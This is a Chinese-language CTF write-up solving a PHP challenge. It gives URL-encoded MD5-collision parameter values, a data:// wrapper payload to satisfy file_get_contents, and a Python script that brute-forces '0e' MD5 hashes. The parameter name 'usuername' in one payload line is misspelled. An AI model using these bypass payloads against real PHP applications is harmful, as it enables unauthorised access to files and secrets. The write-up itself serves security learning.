题目:
<?php
highlight_file(__FILE__);
if(md5($_GET['pass']) == md5($_GET['username']) && $_GET['pass'] != $_GET['username']){
if(strpos($_GET['username'],"tsctf") === 0){
if(file_get_contents($_POST['file']) === "TSCTF-J{fake_flag}"){
echo file_get_contents("/flag");
}else{
echo "Sorry1";
}
}else{
echo "Sorry2";
}
}else{
echo "Sorry3";
}
Sorry3
这道题一共有三层,我们要绕过第一层可以用数组,或者md5值开头为0e的,但是绕过第一层,我们看到第二层我们GET传参的这个username传参的值开头必须是tsctf,我们就得想办法md5碰撞了。详细请看https://xz.aliyun.com/t/2232
在成功得到两个参数的值后我们就可以绕过第一第二层
pass=tsctf%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%06%D3%C1%90x%81d%7E%7C%A5%D1%0A%F5%97Y%C8%A3%FB%B8JFpG%00C%0EB%AD%D5A%C7%BDl%A3%F2%E1%E0%E9+%D7%8B%FA%CD1%0D%E6%F3i%7C%CB_%E7%D22%7C%E3pK%E3%D9%C4%0A%92%D4%23P%B3%8E1%7BG%D5%D7A%E6%F5f%0D%7E%1D%85%DEl%92N%0F%9B%DB%7C%8D%CFW%5BP%EDA%24%F8%C8j%02%D0%A2%FF%5B%9E%EBPQ%BE%7D%2B%1FOM%1D3u%7Eu%B5%E8%80%B2%E7%AE%D2%A2
usuername=tsctf%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%06%D3%C1%90x%81d%7E%7C%A5%D1%0A%F5%97Y%C8%A3%FB%B8%CAFpG%00C%0EB%AD%D5A%C7%BDl%A3%F2%E1%E0%E9+%D7%8B%FA%CD1%0Df%F4i%7C%CB_%E7%D22%7C%E3pK%E3Y%C4%0A%92%D4%23P%B3%8E1%7BG%D5%D7A%E6%F5f%0D%7E%1D%85%DEl%12N%0F%9B%DB%7C%8D%CFW%5BP%EDA%24%F8%C8j%02%D0%A2%FF%5B%9E%EBPQ%3E%7D%2B%1FOM%1D3u%7Eu%B5%E8%802%E7%AE%D2%A2
第三层:
if(file_get_contents($_POST['file']) === "TSCTF-J{fake_flag}")
用data伪协议
file=data://text/plain,TSCTF-J{fake_flag}
结果:
补充
脚本:
import hashlib
ts = "tsctf" #想要的字符串
def md5(key):
m = hashlib.md5()
m.update(key.encode('utf-8'))
return m.hexdigest()
def check(plx):
t = md5(plx)
if t.startswith("0e"):
return True
else:
return False
for i in range(1,1000000000):
s = ts+str(i)
print(s)
if check(s):
print(s)